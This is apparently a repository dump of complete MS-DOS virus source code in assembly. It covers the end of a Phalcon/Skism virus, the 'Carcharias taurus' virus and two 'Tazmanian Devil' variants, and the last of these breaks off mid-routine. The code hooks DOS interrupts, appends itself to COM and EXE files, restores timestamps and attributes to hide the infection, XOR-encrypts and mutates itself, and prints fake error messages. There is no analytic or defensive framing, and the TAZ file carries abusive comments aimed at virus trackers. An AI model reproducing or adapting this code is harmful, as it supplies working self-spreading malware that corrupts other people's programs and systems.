pop ds
mov word ptr ds:[21h*4], offset int21 ; Replace with new handler
mov ds:[21h*4+2], es ; in high memory
done_install:
pop es
pop ds
cmp sp, id
jne restore_COM
restore_EXE:
mov ax, es
add ax, 0010h
add cs:[bp+word ptr origCSIP+2], ax
add ax, cs:[bp+word ptr origSPSS]
cli
mov ss, ax
mov sp, cs:[bp+word ptr origSPSS+2]
sti
db 00EAh
origCSIP db ?
old3 db 0cdh,20h,0
origSPSS dd ?
restore_COM:
mov di, 0100h
push di
lea si, [bp+offset old3]
movsw
movsb
ret
INT24:
mov al, 0003h
iret
int21:
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
cmp ax, 4B00h ; execute?
jz execute
return:
jmp exitint21
execute:
mov word ptr cs:filename, dx
mov word ptr cs:filename+2, ds
mov ax, 3524h
int 0021h
push es
push bx
lea dx, INT24 ; ASSumes ds=cs
mov ax, 2524h
int 0021h
push cs
pop es
mov bx, dx
cmp word ptr [bx+5], 'DN' ; Check if COMMAND.COM
jz return ; Exit if so
lds dx, cs:filename
mov ax, 4300h
int 0021h
jc return
push cx
push ds
push dx
mov ax, 4301h ; clear file attributes
push ax ; save for later use
xor cx, cx
int 0021h
mov ax, 3D02h
lds dx, cs:filename
int 0021h
xchg ax, bx
push cs
pop ds
mov ax, 5700h ; get file time/date
int 0021h
push cx
push dx
mov ah, 003Fh
mov cx, 001Ah
mov dx, offset readbuffer
int 0021h
mov ax, 4202h
xor cx, cx
cwd
int 0021h
cmp word ptr [offset readbuffer], 'ZM'
jz checkEXE
mov cx, word ptr [offset readbuffer+1] ; jmp location
add cx, heap-start+3 ; convert to filesize
cmp ax, cx ; equal if already infected
jz jmp_close
cmp ax, 65535-(endheap-start) ; check if too large
ja jmp_close ; Exit if so
mov si, offset readbuffer
mov di, offset old3
movsb
movsw
mov cx, 0003h
sub ax, cx
mov word ptr [offset readbuffer+1], ax
mov dl, 00E9h
mov byte ptr [offset readbuffer], dl
jmp short continue_infect
checkEXE:
cmp word ptr [offset readbuffer+10h], id
jnz skipp
jmp_close:
jmp close
skipp:
lea si, readbuffer+14h
lea di, origCSIP
movsw ; Save original CS and IP
movsw
sub si, 000Ah
movsw ; Save original SS and SP
movsw
push bx ; save file handle
mov bx, word ptr [readbuffer+8] ; Header size in paragraphs
mov cl, 0004h
shl bx, cl
push dx ; Save file size on the
push ax ; stack
sub ax, bx ; File size - Header size
sbb dx, 0000h ; DX:AX - BX -> DX:AX
mov cx, 0010h
div cx ; DX:AX/CX = AX Remainder DX
mov word ptr [readbuffer+14h], dx ; IP Offset
mov word ptr [readbuffer+10h], id ; Initial SP
mov word ptr [readbuffer+0Eh], ax ; Para disp stack segment
mov word ptr [readbuffer+16h], ax ; Para disp CS in module.
pop ax ; Filelength in DX:AX
pop dx
add ax, heap-start
adc dx, 0000h
mov cl, 0009h
push ax
shr ax, cl
ror dx, cl
stc
adc dx, ax
pop ax
and ah, 0001h
mov word ptr [readbuffer+4], dx ; Fix-up the file size in
mov word ptr [readbuffer+2], ax ; the EXE header.
pop bx ; restore file handle
mov cx, 001Ah
continue_infect:
push cx ; save # bytes to write
mov cx, heap-start
mov ah, 0040h ; concatenate virus
mov dx, offset start
int 0021h
xor dx, dx
xor cx, cx
mov ax, 4200h
int 0021h
pop cx
mov ah, 0040h
mov dx, offset readbuffer
int 0021h
close:
mov ax, 5701h ; restore file time/date
pop dx
pop cx
int 0021h
mov ah, 003Eh
int 0021h
pop ax ; restore file attributes
pop dx ; get filename and
pop ds
pop cx ; attributes from stack
int 0021h
pop dx
pop ds
mov ax, 2524h
int 0021h
exitint21:
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
db 00EAh ; return to original handler
oldint21 dd ?
signature db '[PS/Gý]',0 ; Phalcon/Skism Gý
creator db 'Phalcon/Skism',0
virusname db '[Gý Virus]',0
heap:
filename dd ?
readbuffer db 1ah dup (?)
endheap:
end start

378
MSDOS/Virus.MSDOS.Unknown.taurus.asm Normal file
View File

@ -0,0 +1,378 @@
TITLE The Carcharias taurus 2.0
.MODEL Tiny
.CODE
.STARTUP
; Some Constants -------------------------------------------------------------
DogSize equ 584-16-6
; ----------------------------------------------------------------------------
db 0E9h ; JMP Loader
dw 3
db 0
dw 0256h
; ************************** DOG LOADER **************************************
Loader:
call GetBP ; Get BP
GetBP: pop BP
sub BP, 103h
push AX ; Save AX
; Find Z-MCB -----------------------------------------------------------------
mov AH, 52h
int 21h
mov DX, ES:[BX-2]
mov DI, (OFFSET Place)-6
mov DS:[BP+DI], DX
NEXT0:
mov DI, (OFFSET Place)-6
mov ES, DS:[BP+DI]
mov DX, ES:[3] ; Calc the next MCB seg
inc DX
add DS:[BP+DI], DX
cmp ES:[0], byte ptr 'Z'
jne NEXT0
; ----------------------------------------------------------------------------
; Looking for the Dog behind Z-MCB -------------------------------------------
push ES
mov DX, ES
add DX, ES:[3]
inc DX
mov ES, DX
mov DX, ES:[3]
pop ES
cmp DX, 815Dh ; 815Dh - Dog's bytes
je LExit
; ----------------------------------------------------------------------------
; Eat 1K in the Z-MCB, Current PSP, BIOS Data --------------------------------
push DS
sub ES:[3], word ptr 40h ; Dec Z-MCB
mov AH, 62h
int 21h
mov DS, BX
sub DS:[2], word ptr 40h ; Dec Curr PSP
xor DX, DX
mov DS, DX
dec word ptr DS:[413h]
pop DS
; ----------------------------------------------------------------------------
; Calculate Dog's segment adress ---------------------------------------------
mov DX, CS
add DX, ES:[3]
mov ES, DX
; ----------------------------------------------------------------------------
; Now load the Dog -----------------------------------------------------------
xor DI, DI
mov SI, BP
add SI, 100h
mov CX, DogSize
cld
rep movsb
; ----------------------------------------------------------------------------
; Hook 21h -------------------------------------------------------------------
; Get old vector
push ES
mov AX, 3521h
int 21h
mov DX, ES
pop ES
mov DI, (OFFSET Exit21h)-100h-6+1
mov ES:[DI], BX
inc DI
inc DI
mov ES:[DI], DX
; Set 21h to Dog
mov AX, 2521h
mov DX, (OFFSET Dog)-100h-6
push DS
push ES
pop DS
int 21h
pop DS
; ----------------------------------------------------------------------------
; Loader Exit ----------------------------------------------------------------
LExit:
; Restore first 6 bytes
mov DI, (OFFSET M_6Bytes)-6
mov AX, word ptr DS:[BP+DI]
inc DI
inc DI
mov BX, word ptr DS:[BP+DI]
inc DI
inc DI
mov CX, word ptr DS:[BP+DI]
mov word ptr CS:[100h], AX
mov word ptr CS:[102h], BX
mov word ptr CS:[104h], CX
; Restore all registers
pop AX
xor BX, BX
xor CX, CX
xor DI, DI
xor SI, SI
xor BP, BP
mov DX, 100h
push DX
xor DX, DX
push DS
pop ES
ret
; ----------------------------------------------------------------------------
; ************************** END of DOG LOADER *******************************
; ******************************* DOG **************************************
Dog:
pushf
cmp AX, 4B00h
je D01
jmp QuickExit
D01: push AX
push BX
push CX
push DX
push DI
push SI
push DS
push ES
push DX ; Store file name
push DS
; Effect ? -------------------------------------------------------------------
mov AH, 2Ah
int 21h
cmp CX, 1993 ; After 1992
jb EExit
cmp DH, 1 ; Jan,
jne EExit
mov AH, 2Ch
int 21h
cmp CH, 14
jne EExit
cmp CL, 30
jb EExit
; yes!
push CS
pop DS
mov CX, 20
mov AH, 2
mov SI, (OFFSET Tired)-100h-6
CHN: mov DL, byte ptr DS:[SI]
inc SI
dec DL
int 21h
loop CHN
; cli
; hlt
; ----------------------------------------------------------------------------
EExit:
; Store old int 24h vector ---------------------------------------------------
mov AX, 3524h ; Get intrpt vector (ES:BX)
int 21h
mov DI, (OFFSET Old24h)-100h-6
mov CS:[DI], BX ; Store BX
inc DI
inc DI
mov CS:[DI], ES ; Store ES
; ----------------------------------------------------------------------------
; Set new int 24h handler ----------------------------------------------------
mov AX, 2524h ; Set intrpt vector (DS:DX)
mov DX, (OFFSET INT24)-100h-6
push CS
pop DS
int 21h
; ----------------------------------------------------------------------------
; -----------------------------------------------------
pop DS
pop DX
; ----------------------------------------------------------------------------
; Open the file --------------------------------------------------------------
mov AX, 3D02h
int 21h
mov DI, (OFFSET Handle)-100h-6
mov CS:[DI], AX
jnc D02
jmp DExit
D02:
; ----------------------------------------------------------------------------
; Read 1st 6 bytes -----------------------------------------------------------
push CS
pop DS
mov AH, 3Fh
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
mov DX, (OFFSET M_6Bytes)-100h-6
mov CX, 6
int 21h
jnc D03
jmp DExit
D03:
; ----------------------------------------------------------------------------
; Check File Format ----------------------------------------------------------
mov DI, (OFFSET M_6Bytes)-100h-6
cmp CS:[DI], 4D5Ah
jne D04
jmp DExit
D04: cmp CS:[DI], 5A4Dh
je DExit
; ----------------------------------------------------------------------------
; Check File for Dog ---------------------------------------------------------
cmp CS:[DI+3], 0256h
je DExit
; ----------------------------------------------------------------------------
; Get and Store file Date&Time -----------------------------------------------
mov AX, 5700h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
int 21h
mov DI, (OFFSET FDate)-100h-6
mov CS:[DI], DX
inc DI
inc DI
mov CS:[DI], CX
; ----------------------------------------------------------------------------
; Get and Store file Size ----------------------------------------------------
mov AX, 4202h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
xor DX, DX
xor CX, CX
int 21h
mov DI, (OFFSET FSize)-100h-6
sub AX, 3
mov CS:[DI], AX
cmp AX, 64512
ja DExit
cmp AX, 6
jb DExit
; ----------------------------------------------------------------------------
; Add Dog to the file --------------------------------------------------------
push CS
pop DS
mov AH, 40h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
mov CX, DogSize
xor DX, DX
int 21h
; ----------------------------------------------------------------------------
; Write 1st 6 bytes to file --------------------------------------------------
; Move file ptr to the start
mov AX, 4200h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
xor DX, DX
xor CX, CX
int 21h
; Write ...
mov AH, 40h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
mov CX, 6
mov DX, (OFFSET DogCall)-100h-6
int 21h
; ----------------------------------------------------------------------------
DExit:
; Set file Date&Time ---------------------------------------------------------
mov AX, 5701h
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
mov DI, (OFFSET FDate)-100h-6
mov DX, CS:[DI]
inc DI
inc DI
mov CX, CS:[DI]
int 21h
; ----------------------------------------------------------------------------
; Close the file -------------------------------------------------------------
mov AH, 3Eh
mov DI, (OFFSET Handle)-100h-6
mov BX, CS:[DI]
int 21h
; ----------------------------------------------------------------------------
; Restore int 24h ------------------------------------------------------------
mov AX, 2524h ; Set intrpt vector (DS:DX)
mov DI, (OFFSET Old24h)-100h-6
mov DX, CS:[DI]
inc DI
inc DI
mov DS, CS:[DI]
int 21h
; ----------------------------------------------------------------------------
pop ES
pop DS
pop SI
pop DI
pop DX
pop CX
pop BX
pop AX
QuickExit: popf
Exit21h: db 0EAh
Int21hIP: dw 0 ; BX
Int21hCS: dw 0 ; ES
; Int 24h handler ------------------------------------------------------------
INT24: xor al, al ; Ignore critical error
iret
; ----------------------------------------------------------------------------
; **************************** END of DOG **********************************
DogData:
M_6Bytes db 90h, 90h, 90h, 90h, 90h, 0C3h
Tired db 11, 11, 'Ibqqz!Ofx!Zfbs!"', 14, 11
DogCall db 0E9h
FSize dw 0606h
Sign db 'V', 2
Handle dw 0606h
Vers dw 0606h
FDate dw 0606h, 0606h ; Date, Time
Old24h dw 0606h, 0606h ; BX:ES
Attrib dw 0606h
Place dw 0606h
END


278
MSDOS/Virus.MSDOS.Unknown.taz-1973.asm Normal file
View File

@ -0,0 +1,278 @@
cr equ 13 ; This VIRUS was written 12-14-1992
lf equ 10 ; AND QUIT READING MY SOURCE CODE
tab equ 9 ; YOU SHITHEAD FUCKNOSE DOUCHE BAG
virus_size equ 1973 ; QUEERBAIT VIRUS TRACKER WANNA-BE!
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute
code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP
;---------------------------------------------------------------------
; All executable code is contained in boundaries of procedure "main".
; The following code, until the start of "virus_code", is the non-
; encrypted CMT portion of the code to load up the real program.
;---------------------------------------------------------------------
main proc near ; Code execution begins here
call encrypt_decrypt ; Decrypt the real virus code
jmp random_mutation ; Put the virus into action
encrypt_val db 00h ; Hold value to encrypt by here
; ---------- Encrypt, save, and restore the virus code -----------
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
call encrypt_decrypt ; Encrypt most of the code
pop bx ; Get back the handle
mov cx,virus_size ; Total number of bytes to write
mov dx,code_start ; Buffer where code starts in memory
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
call encrypt_decrypt ; Restore the code as it was
ret ; Go back to where you came from
; --------------- Encrypt or decrypt the virus code ----------------
encrypt_decrypt:
mov bx,offset virus_code ; Get address to start encrypt/decrypt
xor_loop: ; Start cycle here
mov ah,[bx] ; Get the current byte
xor ah,encrypt_val ; Engage/disengage XOR scheme on it
mov [bx],ah ; Put it back where we got it
inc bx ; Move BX ahead a byte
cmp bx,offset virus_code+virus_size ; Are we at the end?
jle xor_loop ; If not, do another cycle
ret ; and go back where we came from
;-----------------------------------------------------------------------
; The rest of the code from here on remains encrypted until run-time,
; using a fundamental XOR technique that changes via CMT.
;-----------------------------------------------------------------------
virus_code:
;----------------------------------------------------------------------------
; All strings are kept here in the file, and automatically encrypted.
; Please don't be a lamer and change the strings and say you wrote a virus.
; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
; changes, even when the strings stay the same.
;----------------------------------------------------------------------------
exe_filespec db "*.EXE",0
com_filespec db "*.COM",0
newdir db "..",0
fake_msg db cr,lf,"Bad command or filename$"
virus_msg1 db cr,lf," ÜÜÜÜÜÜ$"
virus_msg2 db cr,lf," ÜÜÜÜÜÜÜ ÜÜ ÜÜ ÜÛÛÛÛÛÛÛÛÜ$"
virus_msg3 db cr,lf,"ÞÛÛÛÛÛÛÛÛ ÞÛÛÛ ÜÛÛÛÝ ÞÛÛÛÛßßÛÛÛÛÝ$"
virus_msg4 db cr,lf,"ÛÛÛÛ ÛÛÛÝÛÛÛß ÛÛÛÛÝ ÞÛÛÛÛ ÜÜÜÜ ÜÜÜÜ$"
virus_msg5 db cr,lf,"ÞÛÛÛÛÛÛÜ ÜÜ ÜÜ ÜÛÛÛÜ ÞÛÛÛÛÛÝ ÞÛÛÛÛ ÛÛÛÛÝ ÜÛÛÛÛÛÛÛÜ ÜÛÛÛÛÛÛÛÜ$"
virus_msg6 db cr,lf,"ÛÛÛÛßßßßÞÛÛ ÛÛÛÝÞÛÛÛß ÞÛÛÛÛßÛÛÛ ÛÛÛÛÝ ÞÛÛÛÛ ÞÛÛÛß ßÛß ÞÛÛÛß ßÛß$"
virus_msg7 db cr,lf,"ÛÛÛÛÝ ÞÛÛÝÛÛÛÛÝÞÛÛÛÜ ÛÛÛÛÛÞÛÛÛÜ ÜÛÜ ÞÛÛÛÛÜÜÛÛÛÛÝÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛ$"
virus_msg8 db cr,lf," ßÛÛÛß ßÛÛÛÛÛß ßÛÛÛß ßÛÛß ßÛÛß Þßß Ý ßÛÛÛÛÛÛÛÛß ÞÛÛÝ ÞÛÛÝ$"
virus_msg9 db cr,lf," ÞÛÛÛÝ ßßßßßß ÛÛÛ ÛÛÛ$"
virus_msg10 db cr,lf," ÛßÜÛÛ ÞÛÛÝ ÞÛÛÝ$"
virus_msg11 db cr,lf," ÞÛßßÝ ÜÜÛÛß ÜÜÛÛß$"
virus_msg12 db cr,lf," ÜÜ ÞÛÛÛÝ ÜÜ ßßßß ßßßß$"
virus_msg13 db cr,lf," ÛÛÛÛÞÛÛÝÝÛÛÛÛ$"
virus_msg14 db cr,lf," ÞÛÝÛÛÛÛÞÜÛÛÝÞÛÛÛÝ ÜÜÜÛÛÛÜ$"
virus_msg15 db cr,lf," ÛÛÛÞÛÛÛÛÛÝÜ ÛÛÛÛÛÜÛÛÛßßß$"
virus_msg16 db cr,lf," ÛÛÛÛÛßÛÛ ÛßÛÛÛÛÛÛÛßß$"
virus_msg17 db cr,lf," ÛÛÛÛÛÛÜ ÛÜÛÛÛÛÛÛß$"
virus_msg18 db cr,lf," ßßÛÛÜÛÝÛÛÛÛÛÛÝ$"
virus_msg19 db cr,lf," ÞßÛÛÛ ÜÛÛÛÝ$"
virus_msg20 db cr,lf," ÛÜÛÛÝßßÜÛÛ$"
virus_msg21 db cr,lf," ÞÛÛÜÛÛÛÛÛÛÛÝ$"
virus_msg22 db cr,lf," ÞÛÛÛÛÝÛßÛÛÛÝ$"
virus_msg23 db cr,lf," ÞÛÛÜÛÜÛÛÛÛÛÝ$"
compare_buf db 20 dup (?) ; Buffer to compare files in
files_found db ?
files_infected db ?
orig_time dw ?
orig_date dw ?
orig_attr dw ?
handle dw ?
success db ?
random_mutation: ; First decide if virus is to mutate
mov ah,2ch ; Set up DOS function to get time
int 21h
cmp encrypt_val,0 ; Is this a first-run virus copy?
je install_val ; If so, install whatever you get.
cmp dh,15 ; Is it less than 16 seconds?
jg find_extension ; If not, don't mutate this time
install_val:
cmp dl,0 ; Will we be encrypting using zero?
je random_mutation ; If so, get a new value.
mov encrypt_val,dl ; Otherwise, save the new value
find_extension: ; Locate file w/ valid extension
mov files_found,0 ; Count infected files found
mov files_infected,10 ; BX counts file infected so far
mov success,0
find_exe:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset exe_filespec ; Check for .EXE extension first
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je find_com ; If not, nothing more to do
call find_healthy ; Otherwise, try to find healthy .EXE
find_com:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset com_filespec ; Check for .COM extension now
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je chdir ; If not, step back a directory
call find_healthy ; Otherwise, try to find healthy .COM
chdir: ; Routine to step back one level
mov dx,offset newdir ; Load DX with address of pathname
mov ah,3bh ; Change directory DOS service
int 21h
dec files_infected ; This counts as infecting a file
jnz find_exe ; If we're still rolling, find another
jmp exit_virus ; Otherwise let's pack it up
find_healthy:
mov bx,dta ; Point BX to address of DTA
mov ax,[bx]+attribute ; Get the current file's attribute
mov orig_attr,ax ; Save it
mov ax,[bx]+timestamp ; Get the current file's time stamp
mov orig_time,ax ; Save it
mov ax,[bx]+datestamp ; Get the current file's data stamp
mov orig_date,ax ; Save it
mov dx,dta+filename ; Get the filename to change attribute
mov cx,0 ; Clear all attribute bytes
mov al,1 ; Set attribute sub-function
mov ah,43h ; Call DOS service to do it
int 21h
mov al,2 ; Set up to open handle for read/write
mov ah,3dh ; Open file handle DOS service
int 21h
mov handle,ax ; Save the file handle
mov bx,ax ; Transfer the handle to BX for read
mov cx,20 ; Read in the top 20 bytes of file
mov dx,offset compare_buf ; Use the small buffer up top
mov ah,3fh ; DOS read-from-handle service
int 21h
mov bx,offset compare_buf ; Adjust the encryption value
mov ah,encrypt_val ; for accurate comparison
mov [bx+6],ah
mov si,code_start ; One array to compare is this file
mov di,offset compare_buf ; The other array is the buffer
mov ax,ds ; Transfer the DS register...
mov es,ax ; ...to the ES register
cld
repe cmpsb ; Compare the buffer to the virus
jne healthy ; If different, the file is healthy!
call close_file ; Close it up otherwise
inc files_found ; Chalk up another fucked up file
continue_search:
mov ah,4fh ; Find next DOS function
int 21h ; Try to find another same type file
cmp ax,12h ; Are there any more files?
je no_more_found ; If not, get outta here
jmp find_healthy ; If so, try the process on this one!
no_more_found:
ret ; Go back to where we came from
healthy:
mov bx,handle ; Get the file handle
mov ah,3eh ; Close it for now
int 21h
mov ah,3dh ; Open it again, to reset it
mov dx,dta+filename
mov al,2
int 21h
mov handle,ax ; Save the handle again
call infect_file ; Infect the healthy file
call close_file ; Close down this operation
inc success ; Indicate we did something this time
dec files_infected ; Scratch off another file on agenda
jz exit_virus ; If we're through, terminate
jmp continue_search ; Otherwise, try another
ret
close_file:
mov bx,handle ; Get the file handle off the stack
mov cx,orig_time ; Get the date stamp
mov dx,orig_date ; Get the time stamp
mov al,1 ; Set file date/time sub-service
mov ah,57h ; Get/Set file date and time service
int 21h ; Call DOS
mov bx,handle
mov ah,3eh ; Close handle DOS service
int 21h
mov cx,orig_attr ; Get the file's original attribute
mov al,1 ; Instruct DOS to put it back there
mov dx,dta+filename ; Feed it the filename
mov ah,43h ; Call DOS
int 21h
ret
exit_virus:
cmp files_found,5 ; Are at least 5 files infected?
jl print_fake ; If not, keep a low profile
cmp success,0 ; Did we infect anything?
jg print_fake ; If so, cover it up
mov ah,09h ; Use DOS print string service
mov dx,offset virus_msg1 ; Load the address of the first line
int 21h ; Print it
mov dx,offset virus_msg2 ; Load the second line
int 21h ; (etc)
mov dx,offset virus_msg3
int 21h
mov dx,offset virus_msg4
int 21h
mov dx,offset virus_msg5
int 21h
mov dx,offset virus_msg6
int 21h
mov dx,offset virus_msg7
int 21h
mov dx,offset virus_msg8
int 21h
mov dx,offset virus_msg9
int 21h
mov dx,offset virus_msg10
int 21h
mov dx,offset virus_msg11
int 21h
mov dx,offset virus_msg12
int 21h
mov dx,offset virus_msg13
int 21h
mov dx,offset virus_msg14
int 21h
mov dx,offset virus_msg15
int 21h
mov dx,offset virus_msg16
int 21h
mov dx,offset virus_msg17
int 21h
mov dx,offset virus_msg18
int 21h
mov dx,offset virus_msg19
int 21h
mov dx,offset virus_msg20
int 21h
mov dx,offset virus_msg21
int 21h
mov dx,offset virus_msg22
int 21h
mov dx,offset virus_msg23
int 21h
jmp terminate
print_fake:
mov ah,09h ; Use DOS to print fake error message
mov dx,offset fake_msg
int 21h
terminate:
mov ah,4ch ; DOS terminate process function
int 21h ; Call DOS to get out of this program
; filler db 8 dup (90h) ; Pad out the file length to 666 bytes
main endp
code ends
end main

276
MSDOS/Virus.MSDOS.Unknown.taz-2197.asm Normal file
View File

@ -0,0 +1,276 @@
cr equ 13 ; Carriage return ASCII code
lf equ 10 ; Linefeed ASCII code
tab equ 9 ; Tab ASCII code
virus_size equ 2197 ; Size of the virus file
code_start equ 100h ; Address right after PSP in memory
dta equ 80h ; Addr of default disk transfer area
datestamp equ 24 ; Offset in DTA of file's date stamp
timestamp equ 22 ; Offset in DTA of file's time stamp
filename equ 30 ; Offset in DTA of ASCIIZ filename
attribute equ 21 ; Offset in DTA of file attribute
code segment 'code' ; Open code segment
assume cs:code,ds:code ; One segment for both code & data
org code_start ; Start code image after PSP
;---------------------------------------------------------------------
; All executable code is contained in boundaries of procedure "main".
; The following code, until the start of "virus_code", is the non-
; encrypted CMT portion of the code to load up the real program.
;---------------------------------------------------------------------
main proc near ; Code execution begins here
call encrypt_decrypt ; Decrypt the real virus code
jmp random_mutation ; Put the virus into action
encrypt_val db 00h ; Hold value to encrypt by here
; ---------- Encrypt, save, and restore the virus code -----------
infect_file:
mov bx,handle ; Get the handle
push bx ; Save it on the stack
call encrypt_decrypt ; Encrypt most of the code
pop bx ; Get back the handle
mov cx,virus_size ; Total number of bytes to write
mov dx,code_start ; Buffer where code starts in memory
mov ah,40h ; DOS write-to-handle service
int 21h ; Write the virus code into the file
call encrypt_decrypt ; Restore the code as it was
ret ; Go back to where you came from
; --------------- Encrypt or decrypt the virus code ----------------
encrypt_decrypt:
mov bx,offset virus_code ; Get address to start encrypt/decrypt
xor_loop: ; Start cycle here
mov ah,[bx] ; Get the current byte
xor ah,encrypt_val ; Engage/disengage XOR scheme on it
mov [bx],ah ; Put it back where we got it
inc bx ; Move BX ahead a byte
cmp bx,offset virus_code+virus_size ; Are we at the end?
jle xor_loop ; If not, do another cycle
ret ; and go back where we came from
;-----------------------------------------------------------------------
; The rest of the code from here on remains encrypted until run-time,
; using a fundamental XOR technique that changes via CMT.
;-----------------------------------------------------------------------
virus_code:
;----------------------------------------------------------------------------
; All strings are kept here in the file, and automatically encrypted.
; Please don't be a lamer and change the strings and say you wrote a virus.
; Because of Cybernetic Mutation Technology(tm), the CRC of this file often
; changes, even when the strings stay the same.
;----------------------------------------------------------------------------
exe_filespec db "*.EXE",0
com_filespec db "*.COM",0
newdir db "..",0
fake_msg db cr,lf,"Program too big to fit in memory$"
virus_msg1 db cr," ÜÜÜßÜÛÛÛÜ $"
virus_msg2 db cr," ÜÛßÜßÛßÜßÛÛÜÛÜ $"
virus_msg3 db cr," ÜÛ ÛÛÝ ÛÛÝÞÛÛÛßÜÛÛÜÜÜ ÛÛÛÛÛ ÛÛ ÛÛÛÛÛ $"
virus_msg4 db cr," ßÛÛÜßßÛÝÞÛÛÝÞÛÛÝ ÛÛßÜÜÜÜßÛÜÜÜ Û Û Û Û $"
virus_msg5 db cr," ÜÛÛÛßßÛÜßÜßÝ ßß ÜÜÛÛÛÛÛÛ ÛÛÛÛßß Û ÛÛÛÛ Û $"
virus_msg6 db cr," ßÛÛßÜÛÛÜÜß ÜÜ ßÛÛÛßßßÛÛÛ ÛÛÛÛÜ Ü Û Û Û Û $"
virus_msg7 db cr," Ü ÛÞÝÞÛÜÜ ÜÛÜ ÜÛÛÛÛß ÜßÛÝÞÛÛÛÛÛÜÛÜ Û Û Û ÛÛÛÛÛ $"
virus_msg8 db cr," ÛÛÛÜÞÛ ÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛßÜßÜÛÛÛÛ ÛÛÛÛÛÛÛÛÛÜ $"
virus_msg9 db cr," ÛÛÛÛÛ ÛÛ ÛÛÛÛßÜÜ ÛÜßßßÜÜß ÛÛÛÛÛÛ ÛÛÛÛÛÛÛÛÛÛÛ $"
virus_msg10 db cr," ÛÛÛÛÛÛÛ ÛÛ ÛÛÛÜßÝ ÛÛÛÛ Þß ÛÛÛÛÛÛÛ ÛÛßßÛÛÛÛÛÛÛÛÜ $"
virus_msg11 db cr," ÜÛÜßÛÛßßß ÛÛ ÛÛÛÛÜ ÛÛÛÛßÜÜÞÛÛÛÛÛÛÝÞÛÛ ÜÜÛÛÛÛÛÛÛÛÜ $"
virus_msg12 db cr," ÛÛÜÜÛÛÛÝ ÛÛ ÛÛÛÛ ÛßßßÞÛÝÛÛÛÛÛÛÛ ÛÛ ÛÛÛßÛÛÛÛÛÛÛÛÛÝ $"
virus_msg13 db cr," ÞÛÜßÛÛÛÛÛÛ ÛÜßÜÛÛ ÜÞÝÞÛ ÛÛßÛÛÛ ÛÛÝ ßß ÜÛÛÛÛÛÝßß $"
virus_msg14 db cr," ßßÜÛÜÜßß ßÞÛßÜÝÞÞÛÝÞÛÛÜß ÛßÜÛÛß ÛÛÛÝÞÛÛÛ $"
virus_msg15 db cr," ÜÛÛÛÛÛÛÜßßÛÛ ÛÛÛÛÛÛÛÛÛÛÜ ÛÛÛÛÛÜ $"
virus_msg16 db cr," ßÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜ $"
virus_msg17 db cr," ÜÜÛÛÛÜÜ ßÛÛÛÛÜ ßßßßßßß ÜÛÛÛÛÛÛÛ $"
virus_msg18 db cr," ÜßÜÜÛÛÛÛÛÛÛÛÛÜÜÜÛÛÛÛÛÜ ÜÜÛÛÛÛÛÛßßÜÜÜÜÛÛÛÛÜÜ $"
virus_msg19 db cr,"ÜßÜÛÛßÜÜÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ßÛÛÛÛÛÛÜÜÛÛÛÛÛßßÛÛÛÛÜßÜ $"
virus_msg20 db cr," ÛÛÛÝÞÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛßßß ßßÛÛÛÛÛÛÛÛÛÛÛÛÜÜßÛÛÝÞ $"
virus_msg21 db cr," ßß ßÛÛÛÛÛßßßßßß ßßÛÛÛÛÛÛÛÛÛÛÛ ÛÛÝ $"
virus_msg22 db cr,"The Tazmanian Devil Virus (TAZ!) - Released 12-14-1992 - Sector Infector $"
compare_buf db 20 dup (?) ; Buffer to compare files in
files_found db ?
files_infected db ?
orig_time dw ?
orig_date dw ?
orig_attr dw ?
handle dw ?
success db ?
random_mutation: ; First decide if virus is to mutate
mov ah,2ch ; Set up DOS function to get time
int 21h
cmp encrypt_val,0 ; Is this a first-run virus copy?
je install_val ; If so, install whatever you get.
cmp dh,15 ; Is it less than 16 seconds?
jg find_extension ; If not, don't mutate this time
install_val:
cmp dl,0 ; Will we be encrypting using zero?
je random_mutation ; If so, get a new value.
mov encrypt_val,dl ; Otherwise, save the new value
find_extension: ; Locate file w/ valid extension
mov files_found,0 ; Count infected files found
mov files_infected,4 ; BX counts file infected so far
mov success,0
find_exe:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset exe_filespec ; Check for .EXE extension first
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je find_com ; If not, nothing more to do
call find_healthy ; Otherwise, try to find healthy .EXE
find_com:
mov cx,00100111b ; Look for all flat file attributes
mov dx,offset com_filespec ; Check for .COM extension now
mov ah,4eh ; Call DOS find first service
int 21h
cmp ax,12h ; Are no files found?
je chdir ; If not, step back a directory
call find_healthy ; Otherwise, try to find healthy .COM
chdir: ; Routine to step back one level
mov dx,offset newdir ; Load DX with address of pathname
mov ah,3bh ; Change directory DOS service
int 21h
dec files_infected ; This counts as infecting a file
jnz find_exe ; If we're still rolling, find another
jmp exit_virus ; Otherwise let's pack it up
find_healthy:
mov bx,dta ; Point BX to address of DTA
mov ax,[bx]+attribute ; Get the current file's attribute
mov orig_attr,ax ; Save it
mov ax,[bx]+timestamp ; Get the current file's time stamp
mov orig_time,ax ; Save it
